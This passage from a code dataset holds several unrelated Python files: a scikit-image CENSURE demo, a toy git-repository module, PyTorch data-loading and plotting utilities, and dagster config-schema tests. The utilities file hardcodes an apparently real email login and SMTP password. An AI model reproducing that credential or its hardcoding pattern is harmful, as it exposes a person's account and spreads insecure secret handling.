step_size=10,\n# exposure_time = 0.3,\n# tweak_motor_range=10000, tweak_motor_num_steps=5,\n# plot_func=None, liveplot_kwargs=None)\n#\n# # # # for uid in df.uid[[0, 5, 8]]:\n# for uid in df.uid:\n# estimate_peak_fwhm_from_roll_scan(uid, 'aux4', pil100k_roi_num=1,plotting=True, fignum=1, clear=False)\n# # estimate_peak_fwhm_from_elastic_step_scan(uid, pil100k_roi_num=1, plotting=True, fignum=1, clear=False)\n\n\n", "sub_path": "startup/82-johann_plans.py", "file_name": "82-johann_plans.py", "file_ext": "py", "file_size_in_byte": 35334, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "xas.spectrometer.analyze_elastic_fly_scan", "line_number": 195, "usage_type": "call"}, {"api_name": "scipy.signal.savgol_filter", "line_number": 277, "usage_type": "call"}, {"api_name": "scipy.signal.savgol_filter", "line_number": 281, "usage_type": "call"}]}
+{"seq_id": "575980572", "text": "\"\"\"\nThe CENSURE feature detector is a scale-invariant center-surround detector (CENSURE) that claims to outperform other\ndetectors and is capable of real-time implementation.\n\"\"\"\n\nfrom skimage import data\nfrom skimage import io, feature, img_as_float\nfrom skimage import color\nfrom skimage import transform as tf\nfrom skimage.feature import CENSURE\nfrom skimage.color import rgb2gray\n\nimport matplotlib.pyplot as plt\nimport os\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nimage = color.rgb2gray(io.imread(dir_path+'/media/IRIS3.jpg'))\n\nimg_orig = rgb2gray(image)\ntform = tf.AffineTransform(scale=(1.5, 1.5), rotation=0.7,\n translation=(150, -100))\nimg_warp = tf.warp(img_orig, tform)\n\ndetector = CENSURE()\n\nfig, ax = plt.subplots(nrows=1, ncols=2, figsize=(12, 6))\n\ndetector.detect(img_orig)\n\nax[0].imshow(img_orig, cmap=plt.cm.gray)\nax[0].scatter(detector.keypoints[:, 1], detector.keypoints[:, 0],\n 2 ** detector.scales, facecolors='none', edgecolors='r')\nax[0].set_title(\"Original Image\")\n\ndetector.detect(img_warp)\n\nax[1].imshow(img_warp, cmap=plt.cm.gray)\nax[1].scatter(detector.keypoints[:, 1], detector.keypoints[:, 0],\n 2 ** detector.scales, facecolors='none', edgecolors='r')\nax[1].set_title('Transformed Image')\n\nfor a in ax:\n a.axis('off')\n\nplt.tight_layout()\nplt.show()", "sub_path": "OpenCV/censor.py", "file_name": "censor.py", "file_ext": "py", "file_size_in_byte": 1347, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 16, "usage_type": "call"}, {"api_name": "skimage.color.rgb2gray", "line_number": 17, "usage_type": "call"}, {"api_name": "skimage.color", "line_number": 17, "usage_type": "name"}, {"api_name": "skimage.io.imread", "line_number": 17, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 17, "usage_type": "name"}, {"api_name": "skimage.color.rgb2gray", "line_number": 19, "usage_type": "call"}, {"api_name": "skimage.transform.AffineTransform", "line_number": 20, "usage_type": "call"}, {"api_name": "skimage.transform", "line_number": 20, "usage_type": "name"}, {"api_name": "skimage.transform.warp", "line_number": 22, "usage_type": "call"}, {"api_name": "skimage.transform", "line_number": 22, "usage_type": "name"}, {"api_name": "skimage.feature.CENSURE", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 30, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 37, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "480285328", "text": "import os\nimport pathlib\nimport typing as tp\n\n\ndef repo_find(workdir: tp.Union[str, pathlib.Path] = \".\") -> pathlib.Path:\n global a\n a = None\n try:\n gitdir = os.environ[\"GIT_DIR\"]\n wd_abs = pathlib.Path(workdir).absolute()\n if workdir == gitdir:\n return (wd_abs)\n else:\n for dirpath, dirnames, filenames in os.walk(workdir):\n for name in dirnames:\n name_cr = os.path.join(dirpath, name)\n if name == gitdir:\n a = pathlib.Path(name_cr)\n if (a == None):\n parent = os.path.dirname(workdir)\n repo_find(parent)\n return (a)\n except:\n raise AssertionError(\"Not a git repository\")\n\n\ndef repo_create(workdir: tp.Union[str, pathlib.Path]) -> pathlib.Path:\n if \"GIT_DIR\" not in os.environ:\n os.environ[\"GIT_DIR\"] = \".git\"\n gitdir = os.environ[\"GIT_DIR\"]\n if pathlib.Path(workdir).is_dir():\n workdir = pathlib.Path(workdir)\n if not os.path.exists(workdir / gitdir):\n os.mkdir(workdir / gitdir)\n if not os.path.exists(workdir / gitdir / \"refs\"):\n os.mkdir(workdir / gitdir / \"refs\")\n if not os.path.exists(workdir / gitdir / \"refs\" / \"heads\"):\n os.mkdir(workdir / gitdir / \"refs\" / \"heads\")\n if not os.path.exists(workdir / gitdir / \"refs\" / \"tags\"):\n os.mkdir(workdir / gitdir / \"refs\" / \"tags\")\n if not os.path.exists(workdir / gitdir / \"objects\"):\n os.mkdir(workdir / gitdir / \"objects\")\n if not os.path.exists(workdir / gitdir / \"HEAD\"):\n pathlib.Path(workdir / gitdir / \"HEAD\").touch()\n with pathlib.Path(workdir / gitdir / \"HEAD\").open(\"w\") as f:\n f.write(\"ref: refs/heads/master\\n\")\n f.close()\n if not os.path.exists(workdir / gitdir / \"config\"):\n pathlib.Path(workdir / gitdir / \"config\").touch()\n with pathlib.Path(workdir / gitdir / \"config\").open(\"w\") as f:\n f.write(\n \"[core]\\n\\trepositoryformatversion = 0\\n\\tfilemode = true\\n\\tbare = false\\n\\tlogallrefupdates = false\\n\")\n f.close()\n if not os.path.exists(workdir / gitdir / \"description\"):\n pathlib.Path(workdir / gitdir / \"description\").touch()\n with pathlib.Path(workdir / gitdir / \"description\").open(\"w\") as f:\n f.write(\"Unnamed pyvcs repository.\\n\")\n f.close()\n return (pathlib.Path(gitdir))\n else:\n raise AssertionError(f\"{workdir} is not a directory\")\n", "sub_path": "homework04/pyvcs/repo.py", "file_name": "repo.py", "file_ext": "py", "file_size_in_byte": 2617, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Union", "line_number": 6, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 11, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ", 
"line_number": 31, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 32, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 45, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 46, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 49, "usage_type": "call"}, {"api_name": "os.path", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 50, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 56, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 57, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 60, "usage_type": "call"}]}
+{"seq_id": "653730760", "text": "import os\r\nimport torch\r\nimport time\r\n\r\n\r\nimport numpy as np \r\nimport yagmail as yg \r\nimport pandas as pd\r\nimport plotly.offline as py\r\nimport plotly.graph_objs as go\r\n\r\nfrom scipy import ndimage\r\nfrom PIL import Image\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\ndef median_pool(img,filter_size):\r\n pool_img = ndimage.median_filter(np.asarray(img)[:,:,:-1],filter_size)\r\n return pool_img\r\n\r\ndef load_data(lr_folder,hr_folder,test_percent=0.33):\r\n # currently using num_train & num_test\r\n # in the future may modified to shuffle and select a portion of all dataset\r\n train_img = []\r\n files = os.listdir(lr_folder)\r\n lr_train, lr_test, hr_train, hr_test = train_test_split(files, files,test_size=test_percent, random_state=42)\r\n for file in lr_train:\r\n pair = []\r\n lr_img = Image.open(os.path.join(lr_folder,file))\r\n# lr_img = Image.fromarray(median_pool(lr_img,3))\r\n lr_img = lr_img.resize((128,128),Image.BICUBIC)\r\n hr_img = Image.open(os.path.join(hr_folder,file))\r\n pair.append(torch.FloatTensor(np.asarray(lr_img)[:,:,0]).view(1,128,128))\r\n pair.append(torch.FloatTensor(np.asarray(hr_img)[:,:,0]).view(1,128,128))\r\n train_img.append(pair)\r\n \r\n test_img = []\r\n for file in lr_test:\r\n pair = []\r\n lr_img = Image.open(os.path.join(lr_folder,file))\r\n# lr_img = Image.fromarray(median_pool(lr_img,3))\r\n lr_img = lr_img.resize((128,128),Image.BICUBIC)\r\n hr_img = Image.open(os.path.join(hr_folder, file))\r\n pair.append(torch.FloatTensor(np.asarray(lr_img)[:,:,0]).view(1,128,128))\r\n pair.append(torch.FloatTensor(np.asarray(hr_img)[:,:,0]).view(1,128,128))\r\n test_img.append(pair)\r\n\r\n return (train_img,test_img)\r\n\r\ndef email_res(reciever,subject=\"run_res\",content=None,attach=None):\r\n try:\r\n yag = yg.SMTP(user='widen1226@163.com',password='1S22S22P63S23P6',\r\n host='smtp.163.com')\r\n yag.send(reciever,subject,content,attachments=attach) \r\n print(\"send result to %s successfully\" % reciever)\r\n except:\r\n print('email did not send due to unknown error')\r\n\r\n\r\ndef plot_loss(train_loss, test_loss, pic_name):\r\n \"\"\"\r\n train_loss: 1*N list\r\n test_loss: 1*N list\r\n pic_name: path to save the plot\r\n \"\"\"\r\n x = np.arange(1,len(train_loss)+1)\r\n trace0 = go.Scatter(\r\n x = x,\r\n y = train_loss,\r\n name = \"train_loss\"\r\n )\r\n trace1 = go.Scatter(\r\n x = x,\r\n y = test_loss,\r\n name = \"test_loss\"\r\n )\r\n layout = dict(title = 'Train Loss v.s. 
Test Loss',\r\n xaxis = dict(title = 'Num of Epoches'),\r\n yaxis = dict(title = 'MSE Loss'),\r\n )\r\n\r\n data = [trace0, trace1]\r\n fig = dict(data=data, layout=layout)\r\n py.plot(fig, filename=pic_name, auto_open=False)\r\n\r\nif __name__ == '__main__':\r\n train_loss = list(np.random.rand(10))\r\n test_loss = list(np.random.rand(10))\r\n pic_name = \"test.html\"\r\n plot_loss(train_loss, test_loss, pic_name)\r\n", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 3079, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "scipy.ndimage.median_filter", "line_number": 18, "usage_type": "call"}, {"api_name": "scipy.ndimage", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 18, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 29, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 31, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 31, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 32, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 32, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 40, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 40, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PIL.Image.BICUBIC", "line_number": 42, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 42, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 43, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 43, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.FloatTensor", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 45, "usage_type": "call"}, {"api_name": "yagmail.SMTP", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 66, "usage_type": "call"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 67, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 67, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 72, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 72, "usage_type": "name"}, {"api_name": "plotly.offline.plot", 
"line_number": 84, "usage_type": "call"}, {"api_name": "plotly.offline", "line_number": 84, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 88, "usage_type": "attribute"}]}
+{"seq_id": "324017370", "text": "from dagster import (\n Array,\n Field,\n ModeDefinition,\n Noneable,\n ScalarUnion,\n Selector,\n Shape,\n pipeline,\n resource,\n solid,\n)\nfrom dagster.config.field import resolve_to_config_type\nfrom dagster.core.meta.config_types import (\n ConfigTypeKind,\n build_config_schema_snapshot,\n meta_from_config_type,\n)\nfrom dagster.core.serdes import deserialize_json_to_dagster_namedtuple, serialize_dagster_namedtuple\n\n\ndef meta_from_dagster_type(dagster_type):\n return meta_from_config_type(resolve_to_config_type(dagster_type))\n\n\ndef test_basic_int_meta():\n int_meta = meta_from_dagster_type(int)\n assert int_meta.given_name == 'Int'\n assert int_meta.key == 'Int'\n assert int_meta.kind == ConfigTypeKind.SCALAR\n assert int_meta.enum_values is None\n assert int_meta.fields is None\n\n\ndef test_basic_dict():\n dict_meta = meta_from_dagster_type({'foo': int})\n assert dict_meta.key.startswith('Shape.')\n assert dict_meta.given_name is None\n child_type_keys = dict_meta.get_child_type_keys()\n assert child_type_keys\n assert len(child_type_keys) == 1\n assert child_type_keys[0] == 'Int'\n assert child_type_keys[0]\n\n assert dict_meta.fields and len(dict_meta.fields) == 1\n\n field = dict_meta.fields[0]\n assert field.name == 'foo'\n\n\ndef test_field_things():\n dict_meta = meta_from_dagster_type(\n {\n 'req': int,\n 'opt': Field(int, is_required=False),\n 'opt_with_default': Field(int, is_required=False, default_value=2),\n 'req_with_desc': Field(int, description='A desc'),\n }\n )\n\n assert dict_meta.fields and len(dict_meta.fields) == 4\n\n field_meta_dict = {field_meta.name: field_meta for field_meta in dict_meta.fields}\n\n assert field_meta_dict['req'].is_required is True\n assert field_meta_dict['req'].description is None\n assert field_meta_dict['opt'].is_required is False\n assert field_meta_dict['opt_with_default'].is_required is False\n assert field_meta_dict['opt_with_default'].default_provided is True\n assert field_meta_dict['opt_with_default'].default_value_as_str == '2'\n\n assert field_meta_dict['req_with_desc'].is_required is True\n assert field_meta_dict['req_with_desc'].description == 'A desc'\n\n\ndef test_basic_list():\n list_meta = meta_from_dagster_type(Array(int))\n assert list_meta.key.startswith('Array')\n child_type_keys = list_meta.get_child_type_keys()\n assert child_type_keys\n assert len(child_type_keys) == 1\n assert child_type_keys[0] == 'Int'\n\n\ndef test_basic_optional():\n optional_meta = meta_from_dagster_type(Noneable(int))\n assert optional_meta.key.startswith('Noneable')\n\n child_type_keys = optional_meta.get_child_type_keys()\n assert child_type_keys\n assert len(child_type_keys) == 1\n assert child_type_keys[0] == 'Int'\n assert optional_meta.kind == ConfigTypeKind.NONEABLE\n assert optional_meta.enum_values is None\n\n\ndef test_basic_list_list():\n list_meta = meta_from_dagster_type([[int]])\n assert list_meta.key.startswith('Array')\n child_type_keys = list_meta.get_child_type_keys()\n assert child_type_keys\n assert len(child_type_keys) == 1\n assert child_type_keys[0] == 'Array.Int'\n assert list_meta.enum_values is None\n\n\ndef test_list_of_dict():\n inner_dict_dagster_type = Shape({'foo': Field(str)})\n list_of_dict_meta = meta_from_dagster_type([inner_dict_dagster_type])\n\n assert list_of_dict_meta.key.startswith('Array')\n child_type_keys = list_of_dict_meta.get_child_type_keys()\n assert child_type_keys\n assert len(child_type_keys) == 1\n assert 
child_type_keys[0].startswith('Shape')\n\n\ndef test_selector_of_things():\n selector_meta = meta_from_dagster_type(Selector({'bar': Field(int)}))\n assert selector_meta.key.startswith('Selector')\n assert selector_meta.kind == ConfigTypeKind.SELECTOR\n assert selector_meta.fields and len(selector_meta.fields) == 1\n field_meta = selector_meta.fields[0]\n assert field_meta.name == 'bar'\n assert field_meta.type_key == 'Int'\n\n\ndef test_kitchen_sink():\n kitchen_sink = resolve_to_config_type(\n [\n {\n 'opt_list_of_int': Field(int, is_required=False),\n 'nested_dict': {\n 'list_list': [[int]],\n 'nested_selector': Field(\n Selector({'some_field': int, 'more_list': Noneable([bool])})\n ),\n },\n }\n ]\n )\n\n kitchen_sink_meta = meta_from_dagster_type(kitchen_sink)\n\n rehydrated_meta = deserialize_json_to_dagster_namedtuple(\n serialize_dagster_namedtuple(kitchen_sink_meta)\n )\n assert kitchen_sink_meta == rehydrated_meta\n\n\ndef test_simple_pipeline_smoke_test():\n @solid\n def solid_without_config(_):\n pass\n\n @pipeline\n def single_solid_pipeline():\n solid_without_config()\n\n config_schema_snapshot = build_config_schema_snapshot(single_solid_pipeline)\n assert config_schema_snapshot.all_config_metas_by_key\n\n serialized = serialize_dagster_namedtuple(config_schema_snapshot)\n rehydrated_config_schema_snapshot = deserialize_json_to_dagster_namedtuple(serialized)\n assert config_schema_snapshot == rehydrated_config_schema_snapshot\n\n\ndef test_check_solid_config_correct():\n @solid(config={'foo': str})\n def solid_with_config(_):\n pass\n\n @pipeline\n def single_solid_pipeline():\n solid_with_config()\n\n solid_config_key = solid_with_config.config_field.config_type.key\n\n config_metas = build_config_schema_snapshot(single_solid_pipeline).all_config_metas_by_key\n\n assert solid_config_key in config_metas\n\n solid_config_meta = config_metas[solid_config_key]\n\n assert solid_config_meta.kind == ConfigTypeKind.STRICT_SHAPE\n assert len(solid_config_meta.fields) == 1\n\n foo_field = solid_config_meta.fields[0]\n\n assert foo_field.name == 'foo'\n assert foo_field.type_key == 'String'\n\n\ndef test_check_solid_list_list_config_correct():\n @solid(config={'list_list_int': [[{'bar': int}]]})\n def solid_with_config(_):\n pass\n\n @pipeline\n def single_solid_pipeline():\n solid_with_config()\n\n solid_config_key = solid_with_config.config_field.config_type.key\n\n config_metas = build_config_schema_snapshot(single_solid_pipeline).all_config_metas_by_key\n assert solid_config_key in config_metas\n solid_config_meta = config_metas[solid_config_key]\n\n assert solid_config_meta.kind == ConfigTypeKind.STRICT_SHAPE\n assert len(solid_config_meta.fields) == 1\n\n list_list_field = solid_config_meta.fields[0]\n\n list_list_type_key = list_list_field.type_key\n\n assert list_list_type_key.startswith('Array.Array.')\n\n list_list_type = config_metas[list_list_type_key]\n\n assert list_list_type.kind == ConfigTypeKind.ARRAY\n list_meta = config_metas[list_list_type.inner_type_key]\n assert list_meta.kind == ConfigTypeKind.ARRAY\n assert config_metas[list_meta.inner_type_key].kind == ConfigTypeKind.STRICT_SHAPE\n\n\ndef test_kitchen_sink_break_out():\n @solid(\n config=[\n {\n 'opt_list_of_int': Field([int], is_required=False),\n 'nested_dict': {\n 'list_list': [[int]],\n 'nested_selector': Selector(\n {'some_field': int, 'noneable_list': Noneable([bool])}\n ),\n },\n }\n ]\n )\n def solid_with_kitchen_sink_config(_):\n pass\n\n @pipeline\n def single_solid_pipeline():\n 
solid_with_kitchen_sink_config()\n\n config_metas = build_config_schema_snapshot(single_solid_pipeline).all_config_metas_by_key\n\n solid_config_key = solid_with_kitchen_sink_config.config_field.config_type.key\n assert solid_config_key in config_metas\n solid_config_meta = config_metas[solid_config_key]\n\n assert solid_config_meta.kind == ConfigTypeKind.ARRAY\n\n dict_within_list = config_metas[solid_config_meta.inner_type_key]\n\n assert len(dict_within_list.fields) == 2\n\n opt_field = dict_within_list.get_field('opt_list_of_int')\n\n assert opt_field.is_required is False\n assert config_metas[opt_field.type_key].kind == ConfigTypeKind.ARRAY\n\n nested_dict = config_metas[dict_within_list.get_field('nested_dict').type_key]\n assert len(nested_dict.fields) == 2\n nested_selector = config_metas[nested_dict.get_field('nested_selector').type_key]\n noneable_list_bool = config_metas[nested_selector.get_field('noneable_list').type_key]\n assert noneable_list_bool.kind == ConfigTypeKind.NONEABLE\n list_bool = config_metas[noneable_list_bool.inner_type_key]\n assert list_bool.kind == ConfigTypeKind.ARRAY\n\n\ndef test_multiple_modes():\n @solid\n def noop_solid(_):\n pass\n\n @resource(config={'a': int})\n def a_resource(_):\n pass\n\n @resource(config={'b': int})\n def b_resource(_):\n pass\n\n @pipeline(\n mode_defs=[\n ModeDefinition(name='mode_a', resource_defs={'resource': a_resource}),\n ModeDefinition(name='mode_b', resource_defs={'resource': b_resource}),\n ]\n )\n def modez():\n noop_solid()\n\n config_metas = build_config_schema_snapshot(modez).all_config_metas_by_key\n\n assert a_resource.config_field.config_type.key in config_metas\n assert b_resource.config_field.config_type.key in config_metas\n\n assert get_config_meta(modez, a_resource.config_field.config_type.key)\n assert get_config_meta(modez, b_resource.config_field.config_type.key)\n\n\ndef get_config_meta(pipeline_def, key):\n return pipeline_def.get_pipeline_snapshot().config_schema_snapshot.get_config_meta(key)\n\n\ndef test_scalar_union():\n # Requiring resolve calls is bad: https://github.com/dagster-io/dagster/issues/2266\n @solid(config=ScalarUnion(resolve_to_config_type(str), resolve_to_config_type({'bar': str})))\n def solid_with_config(_):\n pass\n\n @pipeline\n def single_solid_pipeline():\n solid_with_config()\n\n config_metas = build_config_schema_snapshot(single_solid_pipeline).all_config_metas_by_key\n\n scalar_union_key = solid_with_config.config_field.config_type.key\n\n assert scalar_union_key in config_metas\n\n assert config_metas[config_metas[scalar_union_key].scalar_type_key].key == 'String'\n assert (\n config_metas[config_metas[scalar_union_key].non_scalar_type_key].kind\n == ConfigTypeKind.STRICT_SHAPE\n )\n", "sub_path": "python_modules/dagster/dagster_tests/core_tests/meta_tests/test_config_type_metas.py", "file_name": "test_config_type_metas.py", "file_ext": "py", "file_size_in_byte": 10480, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "dagster.core.meta.config_types.meta_from_config_type", "line_number": 23, "usage_type": "call"}, {"api_name": "dagster.config.field.resolve_to_config_type", "line_number": 23, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.SCALAR", "line_number": 30, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 30, "usage_type": "name"}, {"api_name": "dagster.Field", "line_number": 55, "usage_type": "call"}, 
{"api_name": "dagster.Field", "line_number": 56, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 57, "usage_type": "call"}, {"api_name": "dagster.Array", "line_number": 77, "usage_type": "call"}, {"api_name": "dagster.Noneable", "line_number": 86, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.NONEABLE", "line_number": 93, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 93, "usage_type": "name"}, {"api_name": "dagster.Shape", "line_number": 108, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 108, "usage_type": "call"}, {"api_name": "dagster.Selector", "line_number": 119, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 119, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.SELECTOR", "line_number": 121, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 121, "usage_type": "name"}, {"api_name": "dagster.config.field.resolve_to_config_type", "line_number": 129, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 132, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 135, "usage_type": "call"}, {"api_name": "dagster.Selector", "line_number": 136, "usage_type": "call"}, {"api_name": "dagster.Noneable", "line_number": 136, "usage_type": "call"}, {"api_name": "dagster.core.serdes.deserialize_json_to_dagster_namedtuple", "line_number": 145, "usage_type": "call"}, {"api_name": "dagster.core.serdes.serialize_dagster_namedtuple", "line_number": 146, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 152, "usage_type": "name"}, {"api_name": "dagster.pipeline", "line_number": 156, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 160, "usage_type": "call"}, {"api_name": "dagster.core.serdes.serialize_dagster_namedtuple", "line_number": 163, "usage_type": "call"}, {"api_name": "dagster.core.serdes.deserialize_json_to_dagster_namedtuple", "line_number": 164, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 169, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 173, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 179, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.STRICT_SHAPE", "line_number": 185, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 185, "usage_type": "name"}, {"api_name": "dagster.solid", "line_number": 195, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 199, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.build_config_schema_snapshot", "line_number": 205, "usage_type": "call"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.STRICT_SHAPE", "line_number": 209, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 209, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.ARRAY", "line_number": 220, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", "line_number": 220, "usage_type": "name"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind.ARRAY", "line_number": 222, "usage_type": "attribute"}, {"api_name": "dagster.core.meta.config_types.ConfigTypeKind", 
